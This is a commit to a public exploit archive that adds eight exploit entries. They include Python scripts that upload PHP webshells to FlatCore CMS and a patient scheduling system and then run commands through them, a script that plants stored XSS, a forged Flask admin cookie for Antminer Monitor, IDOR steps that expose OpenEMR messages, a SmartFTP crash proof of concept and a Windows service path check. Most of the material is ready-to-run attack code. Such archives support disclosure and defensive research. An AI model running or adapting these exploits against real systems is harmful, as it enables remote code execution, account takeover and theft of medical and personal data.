DB: 2021-09-07

8 changes to exploits/shellcodes SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service Argus Surveillance DVR 4.0 - Unquoted Service Path OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated) Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR) Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS Antminer Monitor 0.5.0 - Authentication Bypass
2021-09-07 05:02:00 +00:00 · 2021-09-07 05:02:00 +00:00 · 8f90c99e8c
commit 8f90c99e8c
parent c9a65a1f7b
9 changed files with 396 additions and 0 deletions
--- a/exploits/multiple/webapps/50267.txt
+++ b/exploits/multiple/webapps/50267.txt
@ -0,0 +1,48 @@
+# Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass
+# Date: 09/06/2021
+# Dork:https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22
+# Exploit Author: CQR.company / Vulnz.
+# Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor
+# Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/
+# Version: 0.5.0
+# Tested on: Windows, Linux, Macos
+
+
+Software is commonly used for Monitoring antminers and could easily be
+found in zoomeye ( 800), shodan ( 500).
+
+For now this is the most popular antminer monitoring tool.
+
+Vulnerability in Antminer Monitor exists because of backdoor or
+misconfiguration done
+
+by developer inside settings file in flask server.
+
+Settings file has a predefined secret string, which would be randomly
+generated, however it is static in this
+build.antminer-monitor/settings.py at
+5c62e1064af30674bacb9e1917d5980efbde1fcd · anselal/antminer-monitor ·
+GitHub <https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py>
+
+Secret key is 'super secret key'.
+
+Based on this information we can craft authorization bypass cookies.
+
+Using software flask-unsing we can generate cookie which will provide
+you admin access.
+
+flask-unsign --sign --cookie "{'_fresh': True, '_id':
+b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6',
+'_user_id': '1', 'csrf_token':
+b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret
+key"
+
+Additionally you can use this universal cookie to access web interface
+of flask application.
+
+This cookie can work on all systems in "session" field.
+
+.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU
+
+
+In addition DEBUG = True which means /console works, however it needs pin.
--- a/exploits/php/webapps/50260.txt
+++ b/exploits/php/webapps/50260.txt
@ -0,0 +1,18 @@
+# Exploit Title: OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)
+# Date: 31/08/2021
+# Exploit Author: Allen Enosh Upputori
+# Vendor Homepage: https://www.open-emr.org
+# Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads
+# Version:  6.0.0
+# Tested on: Linux
+# CVE : CVE-2021-40352
+
+How to Reproduce this Vulnerability:
+
+1. Install Openemr 6.0.0
+2. Login as an Physician
+3. Open Messages
+4. Click Print
+5. Change the existing "noteid=" value to another number
+
+This will reveal everybodys messages Incuding Admin only Messages
--- a/exploits/php/webapps/50262.py
+++ b/exploits/php/webapps/50262.py
@ -0,0 +1,80 @@
+# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
+# Date: 04/10/2021
+# Exploit Author: Mason Soroka-Gill @sgizoid
+# Vendor Homepage: https://flatcore.org/
+# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
+# Version: 2.0.7
+# Tested on: Ubuntu Server 21.04
+# CVE: CVE-2021-39608
+# References:
+#   - https://github.com/flatCore/flatCore-CMS/issues/52
+
+#!/usr/bin/env python3
+
+import sys
+import requests
+from lxml import html
+from urllib.parse import urlencode
+
+if len(sys.argv) != 4:
+    print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
+    exit(1)
+
+TARGET   = sys.argv[1]
+USERNAME = sys.argv[2]
+PASSWORD = sys.argv[3]
+
+# attempt to log in
+resp = requests.post(f"{TARGET}/index.php?p=1",
+        data={
+            "login_name":f"{USERNAME}",
+            "login_psw":f"{PASSWORD}",
+            "login":"Anmelden"})
+
+# grab the PHP session ID
+PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]
+
+# validate credentials worked
+resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons",
+        headers={"Cookie":PHPSESSID})
+if resp.status_code != 200:
+    print("Invalid credentials")
+    exit(1)
+else:
+    print("Logged in")
+
+# grab the csrf token for the script upload
+csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value
+
+# post the shell to the host
+resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
+        data={"upload_type":"plugin", "csrf_token":csrf_token},                     # the csrf token
+        files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")},   # the webshell
+        headers={"Cookie":PHPSESSID})                                               # the php session id
+
+# pretend to be a shell
+while True:
+    command = input("$ ")
+    if command.lower() == "exit" or command.lower() == "q":
+        break
+    resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}")
+    # verify payload succeeded
+    if resp.status_code == 200:
+        print(resp.text)
+    else:
+        print("Error: Something went wrong, maybe the shell didn't work?")
+        break
+
+# delete the webshell
+resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php",
+        headers={"Cookie":PHPSESSID})
+if resp.status_code == 200:
+    print("Cleaned up webshell")
+
+# clean up the session
+resp = requests.get(f"{TARGET}/index.php?goto=logout",
+        headers={"Cookie":PHPSESSID})
+if resp.status_code == 200:
+    print("Logged out")
+
+exit(0)
--- a/exploits/php/webapps/50263.txt
+++ b/exploits/php/webapps/50263.txt
@ -0,0 +1,25 @@
+# Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
+# Date: 2021-09-05
+# Exploit Author: sudoninja
+# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
+# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
+# Version: 1.0
+# Tested on: Windows 10 - XAMPP Server
+
+# Vulnerable page :
+
+http://localhost/buspassms/admin/view-pass-detail.php?viewid=4
+
+# Vulnerable paramater :
+
+The viewid paramater is Vulnerable to Insecure direct object references (IDOR)
+
+# Proof Of Concept :
+
+# 1 . Download And install [ bus-pass-management-system ]
+# 2 . Go to /admin/index.php and Enter Username & Password
+# 3 . Navigate to search >> search pass
+# 4 . Click on the view and enter the change viewid into the Url
+
+Use :
+http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]
--- a/exploits/php/webapps/50264.py
+++ b/exploits/php/webapps/50264.py
@ -0,0 +1,78 @@
+# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)
+# Date: 03/09/2021
+# Exploit Author: a-rey
+# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14928
+# Version: v1.0
+# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
+# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import time
+import logging
+import requests
+import argparse
+
+BANNER = """
+╔═════════════════════════════════════════════════════════════════════════════════════════════════╗
+║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║
+╚═════════════════════════════════════════════════════════════════════════════════════════════════╝
+ by: \033[0m\033[1;31m █████╗      ██████╗ ███████╗██╗   ██╗\033[0m
+     \033[0m\033[1;32m██╔══██╗     ██╔══██╗██╔════╝██║   ██║\033[0m
+     \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝\033[0m
+     \033[0m\033[1;34m██╔══██║     ██╔══██╗██╔══╝     ██╔╝  \033[0m
+     \033[0m\033[1;35m██║  ██║     ██║  ██║███████╗   ██║   \033[0m
+     \033[0m\033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m
+"""
+
+
+def exploit(url:str, file:str, delay:int) -> None:
+  if not os.path.exists(file):
+    logging.error(f'webshell payload "{file}"" does not exist?')
+    return
+  logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
+  uploadTime = int(time.time())
+  r = requests.post(url + '/classes/SystemSettings.php',
+    files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
+    params={'f' : 'update_settings'},
+    verify=False
+  )
+  if not r.ok:
+    logging.error('HTTP upload request failed')
+    return
+  logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
+  for i in range(uploadTime - delay, uploadTime + delay + 1):
+    r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
+    logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
+    # NOTE: website will send redirects for all files that do not exist
+    if r.status_code != 302:
+      logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
+      return
+  logging.error('failed to find payload on target')
+  logging.warning('maybe need a larger delay or uploads directory is not writable?')
+  return
+
+
+if __name__ == '__main__':
+  # parse arguments
+  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
+  parser.add_argument('-u', '--url',     help='website URL',                                                  type=str, required=True)
+  parser.add_argument('-p', '--payload', help='PHP webshell file to upload',                                  type=str, required=True)
+  parser.add_argument('-d', '--delay',   help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
+  parser.add_argument('--debug',         help='enable debugging output',                                      action='store_true', default=False)
+  args = parser.parse_args()
+  # define logger
+  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
+  logging.SUCCESS = logging.CRITICAL + 1
+  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
+  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
+  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
+  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
+  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
+  # print banner
+  print(BANNER)
+  # run exploit
+  exploit(args.url, args.payload, args.delay)
--- a/exploits/php/webapps/50265.py
+++ b/exploits/php/webapps/50265.py
@ -0,0 +1,75 @@
+# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
+# Date: 03/09/2021
+# Exploit Author: a-rey
+# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14928
+# Version: v1.0
+# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
+# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import logging
+import requests
+import argparse
+
+BANNER = """
+╔═══════════════════════════════════════════════════════════════════╗
+║ Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS ║
+╚═══════════════════════════════════════════════════════════════════╝
+ by: \033[0m\033[1;31m █████╗      ██████╗ ███████╗██╗   ██╗\033[0m
+     \033[0m\033[1;32m██╔══██╗     ██╔══██╗██╔════╝██║   ██║\033[0m
+     \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝\033[0m
+     \033[0m\033[1;34m██╔══██║     ██╔══██╗██╔══╝     ██╔╝  \033[0m
+     \033[0m\033[1;35m██║  ██║     ██║  ██║███████╗   ██║   \033[0m
+     \033[0m\033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m
+"""
+
+
+def exploit(url:str, file:str) -> None:
+  if not os.path.exists(file):
+    logging.error(f'{file} does not exist?')
+    return
+  logging.info(f'reading {file} for XSS content ...')
+  with open(file, 'r') as f:
+    xssPayload = f.read()
+  logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...')
+  r = requests.post(url + '/classes/SystemSettings.php',
+    data={'about_us' : xssPayload},
+    params={'f' : 'update_settings'},
+    verify=False
+  )
+  if not r.ok:
+    logging.error('HTTP request failed')
+    return
+  logging.info('checking for XSS payload on main page ...')
+  r = requests.get(url)
+  if xssPayload not in r.text:
+    logging.error(f'XSS injection failed? received: {r.text}')
+    logging.warning('maybe about.html is not writable?')
+    return
+  logging.success('XSS payload found on target website')
+  return
+
+
+if __name__ == '__main__':
+  # parse arguments
+  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
+  parser.add_argument('-u', '--url',  help='website URL',                     type=str, required=True)
+  parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True)
+  parser.add_argument('--debug',      help='enable debugging output',         action='store_true', default=False)
+  args = parser.parse_args()
+  # define logger
+  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
+  logging.SUCCESS = logging.CRITICAL + 1
+  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
+  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
+  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
+  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
+  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
+  # print banner
+  print(BANNER)
+  # run exploit
+  exploit(args.url, args.file)
--- a/exploits/windows/dos/50266.py
+++ b/exploits/windows/dos/50266.py
@ -0,0 +1,38 @@
+# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
+# Date: 9/5/2021
+# Exploit Author: Eric Salario
+# Vendor Homepage: https://www.smartftp.com/en-us/
+# Software Link: https://www.smartftp.com/en-us/download
+# Version: 10.0.2909.0 (32 and 64 bit)
+# Tested on: Microsoft Windows 10 32 bit and 64 bit
+
+=========================================================================
+
+buffer = "//"
+buffer += "A" * 423
+
+f = open ("path.txt", "w")
+f.write(buffer)
+f.close()
+
+1. Run the python script
+2. Open SmartFTP > New Connection > FTPS (explicit)
+3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
+4. In Path, copy paste the content of the "path.txt" generated by the python script
+5. Click "OK"
+6. SmartFTP client crashes
+
+=======================================================================
+1. Open SmartFTP > New Connection > FTPS (explicit)
+2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
+3. In Path, type slash ("/") and click "OK"
+4. The app should return "Error 0x80072741"
+5. In the path's search bar, replace slash ("/") with whatever and press enter
+6. SmartFTP client crashes
+
+=======================================================================
+
+1. Open SmartFTP
+2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
+3. Once the history is empty, click the bar and type anything
+3. SmartFTP client crashes
--- a/exploits/windows/local/50261.txt
+++ b/exploits/windows/local/50261.txt
@ -0,0 +1,26 @@
+# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
+# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)
+# Date: 03.09.2021
+# Version: Argus Surveillance DVR 4.0
+# Tested on: Windows 10
+
+# Note: "Start as service on Windows Startup" must be enabled in Program Options
+
+# Proof of Concept:
+
+C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Argus Surveillance DVR Watchdog
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+Argus Surveillance DVR Watchdog         ARGUSSURVEILLANCEDVR_WATCHDOG           C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe         Auto
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6798,6 +6798,7 @@ id,file,description,date,author,type,platform,port
 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
 50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows,
+50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service",1970-01-01,"Eric Salario",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -11383,6 +11384,7 @@ id,file,description,date,author,type,platform,port
 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows,
 50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
+50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44382,3 +44384,9 @@ id,file,description,date,author,type,platform,port
 50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
 50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory/Path Traversal",1970-01-01,"Eric Salario",webapps,php,
+50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
+50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
+50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
+50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)",1970-01-01,a-rey,webapps,php,
+50265,exploits/php/webapps/50265.py,"Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS",1970-01-01,a-rey,webapps,php,
+50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple,